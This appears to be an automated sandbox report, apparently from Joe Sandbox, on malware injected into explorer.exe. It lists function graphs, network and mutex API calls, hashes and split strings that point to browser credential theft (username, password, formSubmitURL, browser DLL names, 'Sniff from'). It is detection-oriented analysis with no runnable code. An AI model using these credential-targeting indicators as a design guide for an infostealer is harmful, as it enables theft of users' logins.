                                          control_flow_graph 232 8c9db66-8c9db68 233 8c9db6a-8c9db6b 232->233 234 8c9db93-8c9dbb8 232->234 235 8c9db6d-8c9db71 233->235 236 8c9dbbe-8c9dc22 call 8ca4612 call 8ca6942 * 2 233->236 237 8c9dbbb-8c9dbbc 234->237 235->237 238 8c9db73-8c9db92 235->238 246 8c9dc28-8c9dc2b 236->246 247 8c9dcdc 236->247 237->236 238->234 246->247 248 8c9dc31-8c9dcd3 call 8ca8da4 call 8ca8022 call 8ca83e2 call 8ca8022 call 8ca83e2 CreateMutexW 246->248 249 8c9dcde-8c9dcf6 247->249 248->247 263 8c9dcd5-8c9dcda 248->263 263->249
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881171114.0000000008C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8c00000_explorer.jbxd
                                          Similarity
                                          • API ID: CreateMutex
                                          • String ID: .dll$el32$kern
                                          • API String ID: 1964310414-1222553051
                                          • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                          • Instruction ID: 1e2c7c22e084470d10ea5140d86869bbf14d4a5cc943f3ca54730c832fa9611c
                                          • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                          • Instruction Fuzzy Hash: A2418D74918A088FCF84EFA8C8D8BAD77F0FB58301F04427AD94AEB255DE309945CB85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 08C9DB72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138synchronizationCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881171114.0000000008C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8c00000_explorer.jbxd
                                          Similarity
                                          • API ID: CreateMutex
                                          • String ID: .dll$el32$kern
                                          • API String ID: 1964310414-1222553051
                                          • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                          • Instruction ID: 679fbb3ba863db5c6666f8d6c3476fa385aa5555a82d8f1b79cbbdf145bbb001
                                          • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                          • Instruction Fuzzy Hash: D9414C74918A088FDB84EFA8C898BAD77F0FB68305F04417AD94EDB255DE309945CB85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 08CA372E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 293 8ca372e-8ca3768 294 8ca376a-8ca3782 call 8ca6942 293->294 295 8ca3788-8ca37ab connect 293->295 294->295
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881171114.0000000008C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8c00000_explorer.jbxd
                                          Similarity
                                          • API ID: connect
                                          • String ID: conn$ect
                                          • API String ID: 1959786783-716201944
                                          • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                          • Instruction ID: e9784f0f4b6441bbcb3974d8ee546d29c7b06af2a76378155df9a19610fc8a03
                                          • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                          • Instruction Fuzzy Hash: AD015E74618B188FCB84EF1CE088B55B7E0FB58315F1545AED90DCB226C674C9818BC2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 08CA3732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 298 8ca3732-8ca3768 299 8ca376a-8ca3782 call 8ca6942 298->299 300 8ca3788-8ca37ab connect 298->300 299->300
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881171114.0000000008C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8c00000_explorer.jbxd
                                          Similarity
                                          • API ID: connect
                                          • String ID: conn$ect
                                          • API String ID: 1959786783-716201944
                                          • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                          • Instruction ID: 8f910b5e2b7c06f7d67fc505b2097cb174aadc8fdceb998493858d65b45c863e
                                          • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                          • Instruction Fuzzy Hash: 56012C70618A1C8FCB84EF5CE088B55B7E0FB59315F1541AEA80DCB226CA74C9818BC2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 08CA362C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44networkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 303 8ca362c-8ca366b 304 8ca368b-8ca36a6 WSAStartup 303->304 305 8ca366d-8ca3685 call 8ca6942 303->305 305->304
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881171114.0000000008C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8c00000_explorer.jbxd
                                          Similarity
                                          • API ID: Startup
                                          • String ID: WSAS$tart
                                          • API String ID: 724789610-2426239465
                                          • Opcode ID: eb8e01195b1b45a2b093131951349e4bfa8de15468bd518a6435d0ff3ce2d302
                                          • Instruction ID: 401a83e7599d9ebfa771de74c25066d87ac24787955540f7fc71ed9f4284041f
                                          • Opcode Fuzzy Hash: eb8e01195b1b45a2b093131951349e4bfa8de15468bd518a6435d0ff3ce2d302
                                          • Instruction Fuzzy Hash: 22018B30518A188FCB44DF1CD04CB69FBE0FB58316F2502ADD409CB366C7B0CA428B96
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 08CA3632 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43networkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 308 8ca3632-8ca366b 309 8ca368b-8ca36a6 WSAStartup 308->309 310 8ca366d-8ca3685 call 8ca6942 308->310 310->309
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881171114.0000000008C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8c00000_explorer.jbxd
                                          Similarity
                                          • API ID: Startup
                                          • String ID: WSAS$tart
                                          • API String ID: 724789610-2426239465
                                          • Opcode ID: 8ca80b95c4f802a72df079fcfff649d32c96cc10ab9ce8db75eb9f3d41236f43
                                          • Instruction ID: b10cd9e229e21e194004aaf7f05bea88350c5776fd35703982964d5bd80422e7
                                          • Opcode Fuzzy Hash: 8ca80b95c4f802a72df079fcfff649d32c96cc10ab9ce8db75eb9f3d41236f43
                                          • Instruction Fuzzy Hash: DA014B70518A188FCB84DF1C904CB69FBE0FB58355F2541A9E40DCB266C7B0C9428B96
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 08CA36B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 421 8ca36b2-8ca36e5 422 8ca36e7-8ca36ff call 8ca6942 421->422 423 8ca3705-8ca372d send 421->423 422->423
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881171114.0000000008C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8c00000_explorer.jbxd
                                          Similarity
                                          • API ID: send
                                          • String ID: send
                                          • API String ID: 2809346765-2809346765
                                          • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                          • Instruction ID: c745d8be62b1ed9be712bdc6bbbf27681a244ed134582dc35fc04e0faedcac26
                                          • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                          • Instruction Fuzzy Hash: E7011270518A198FDBC4EF1CD048B2577E0EB58315F1545AED85DCB366C670D8818B81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 08CA35B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 426 8ca35b2-8ca35ea 427 8ca360a-8ca362b socket 426->427 428 8ca35ec-8ca3604 call 8ca6942 426->428 428->427
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881171114.0000000008C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8c00000_explorer.jbxd
                                          Similarity
                                          • API ID: socket
                                          • String ID: sock
                                          • API String ID: 98920635-2415254727
                                          • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                          • Instruction ID: 278628a5d7e8d02344821c3482f104f96cd801d50b5c208f07f54d38e3dbbe9f
                                          • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                          • Instruction Fuzzy Hash: B10121706186188FCB84EF1CD048B54BBE0FB59315F1545ADD45EDB366C7B4C9818B86
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 08C9B2DD Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 431 8c9b2dd-8c9b320 call 8ca6942 434 8c9b3fa-8c9b40e 431->434 435 8c9b326 431->435 436 8c9b328-8c9b339 SleepEx 435->436 436->436 437 8c9b33b-8c9b341 436->437 438 8c9b34b-8c9b352 437->438 439 8c9b343-8c9b349 437->439 441 8c9b370-8c9b376 438->441 442 8c9b354-8c9b35a 438->442 439->438 440 8c9b35c-8c9b36a call 8ca5f12 439->440 440->441 443 8c9b378-8c9b37e 441->443 444 8c9b3b7-8c9b3bd 441->444 442->440 442->441 443->444 447 8c9b380-8c9b38a 443->447 448 8c9b3bf-8c9b3cf call 8c9be72 444->448 449 8c9b3d4-8c9b3db 444->449 447->444 450 8c9b38c-8c9b3b1 call 8c9c432 447->450 448->449 449->436 452 8c9b3e1-8c9b3f5 call 8c9b0f2 449->452 450->444 452->436
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881171114.0000000008C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8c00000_explorer.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                          • Instruction ID: 53f7dbb39f0de8b8e50fbffc3d77d0a89561a47c3148beeac163378148d65c33
                                          • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                          • Instruction Fuzzy Hash: AF318B74614B59EFDF64EF69908C2A5B3B0FB44312F4442BEC9ADCA206CB309961CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 08C9B412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881171114.0000000008C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8c00000_explorer.jbxd
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                          • Instruction ID: 9ff5f723bdf0f8527883b9994d1bc87a4eb20203f4320f5d927bc14b7745a390
                                          • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                          • Instruction Fuzzy Hash: F9F0FC34268A494FD784EF2CD44563AF3E0FBE8215F44057E954DC3354DA75C5424B15
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 08180D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                          • API String ID: 0-393284711
                                          • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                          • Instruction ID: cc990263f633e42d6c356b535aa86a3b70a389a7e608cb872914cdfd3ae8a3a2
                                          • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                          • Instruction Fuzzy Hash: FAE158B4618F488FC765EF68C4857AAB7E0FF58302F504A2E959BC7251DF30A541CB89
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 08183792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                          • API String ID: 0-2916316912
                                          • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                          • Instruction ID: 9442b054741e2249951fcdb9ce4338b9ed3bdd309a40f8e990651c74af7c91c4
                                          • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                          • Instruction Fuzzy Hash: ADB17930518B48CEDB59EF68C486AEEB7F1FF98301F50451ED4AAC7251EF70A5058B86
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 08181622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                          • API String ID: 0-1539916866
                                          • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                          • Instruction ID: 7693f142107bc3d0b09f2303ec604a912b211c70cbb133640ca14ffce2bdcd6b
                                          • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                          • Instruction Fuzzy Hash: 7841A171A18B08CFDB14EF88A4466BD7BE6FB48701F00025ED809D7345DBB59D468BD6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 08188AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                          • API String ID: 0-355182820
                                          • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                          • Instruction ID: bb8c4a4dfbca393da9dacbe09ca4ffb70d34098885cfd972b7f7f0af98825899
                                          • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                          • Instruction Fuzzy Hash: DDC15774618B09CFC759EF28C486AAAF3E1FF98305F40472E959AC7250DF30A615CB86
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 08188F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                          • API String ID: 0-97273177
                                          • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                          • Instruction ID: 1d2b57443b1dc2e0a2687c21e75a5a07e1babe040fb0db37f72dbb47a34e2223
                                          • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                          • Instruction Fuzzy Hash: 8751C13161C748CFD719EF18C4862AAB7E5FF85301F501A2EE88BC7241DBB499068F82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 081822F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                          • API String ID: 0-639201278
                                          • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                          • Instruction ID: 9dcaf5216daa12ffc9c24acf83db93f533e38b7ec1cfab4a18055d0deec65a0c
                                          • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                          • Instruction Fuzzy Hash: EBC1AF74618A198FC759FF68D496AAAB3E1FF98301F91432D944EC7250DF30AA02CB85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 081822F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                          • API String ID: 0-639201278
                                          • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                          • Instruction ID: 10fd7dd8fe30271ae7412a1b9fbfcaab9bdcc8fff1f2acf798bdccc3bbf56c19
                                          • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                          • Instruction Fuzzy Hash: 05C1AF74618A198FC759FF68D496AAAB3E1FF98301F91432D944EC7250DF30AA02CBC5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 08183CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: UR$2$L: $Pass$User$name$word
                                          • API String ID: 0-2058692283
                                          • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                          • Instruction ID: 3a4de212e5bc310c49cd99f60df66a9d9aa3384a27873cccd2b2216619769f54
                                          • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                          • Instruction Fuzzy Hash: 1BA1BE70618748CBDB19EFA89445BEEB7F1FF88311F40462DE48AD7281EF7085458B89
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 08183CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: UR$2$L: $Pass$User$name$word
                                          • API String ID: 0-2058692283
                                          • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                          • Instruction ID: 502fb24694960f22e12e0b714c50a8af562d214edce334ce90a6876f61f0ec9b
                                          • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                          • Instruction Fuzzy Hash: F9918E70618B48CBDB19EFA89445BEEB7F1FF88301F40462DE48AD7251EF7485458B89
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 08183352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $.$e$n$v
                                          • API String ID: 0-1849617553
                                          • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                          • Instruction ID: 510f5d2770d7b45017b687bbb580c0b4dfb458898c5ea8a4d319a3e6fd499391
                                          • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                          • Instruction Fuzzy Hash: 5D71AF31618B48CFD758EFA8C4897AAB7F1FF98305F00062ED45AD7261EB71D9468B81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0817EC32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 2.dl$dll$l32.$ole3$shel
                                          • API String ID: 0-1970020201
                                          • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                          • Instruction ID: 9bd8bcadc2d1c0904998ce52e4baa51f0405502c1617379943f73e8bdf2d1053
                                          • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                          • Instruction Fuzzy Hash: EF513AB0918B4C8BDB65EFA4C045AEEB7F1FF58301F404A2E949AE7254EF3095418B99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0817F86F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4$\$dll$ion.$vers
                                          • API String ID: 0-1610437797
                                          • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                          • Instruction ID: 7295ad3a7fed99e48e53e57371c8b7b340e0959b88f28fd113f81f0775700791
                                          • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                          • Instruction Fuzzy Hash: 69416F34618B488FCB65EF2898457EBB7E4FF98302F51462E988EC7240EF30D5458B82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 081814B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 32.d$cli.$dll$sspi$user
                                          • API String ID: 0-327345718
                                          • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                          • Instruction ID: 40ff5ff045a1ca454eefa0f37f5e24e258736fbea40f162501712d11161d3826
                                          • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                          • Instruction Fuzzy Hash: FE416971A18E0DDFCB98FF6890967AD73E1FF58302F50456AA80BD3240DB70C5828B86
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0817F432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .dll$el32$h$kern
                                          • API String ID: 0-4264704552
                                          • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                          • Instruction ID: 68133996a6479a3b84698bbf114928f64e2cb46923a162da06d98e4539424008
                                          • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                          • Instruction Fuzzy Hash: 45413C70608B8C8FD769DF2884883AAB7E1FF98301F144A6E959AC2265DF70C546CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 081860B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $Snif$f fr$om:
                                          • API String ID: 0-3434893486
                                          • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                          • Instruction ID: 1fdb65e58baa975e38c264d523a53763240f2094b795cd093541cf1979596de5
                                          • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                          • Instruction Fuzzy Hash: 6331CE3151CB889FC71AEB28C4856DAB7D0FF94301F50491EE49AC7292EB30A54ACF43
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 081860C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $Snif$f fr$om:
                                          • API String ID: 0-3434893486
                                          • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                          • Instruction ID: f639367e7c958b73281a3c2d7b3c65e4bba927103b17491ea97f5d42858c30a6
                                          • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                          • Instruction Fuzzy Hash: 7631CF71518B48AFD719EB28C4856EAB7D5FF94301F40492EE49BC7352EB30A5068E43
                                          Uniqueness

                                          Uniqueness Score: -1.00%

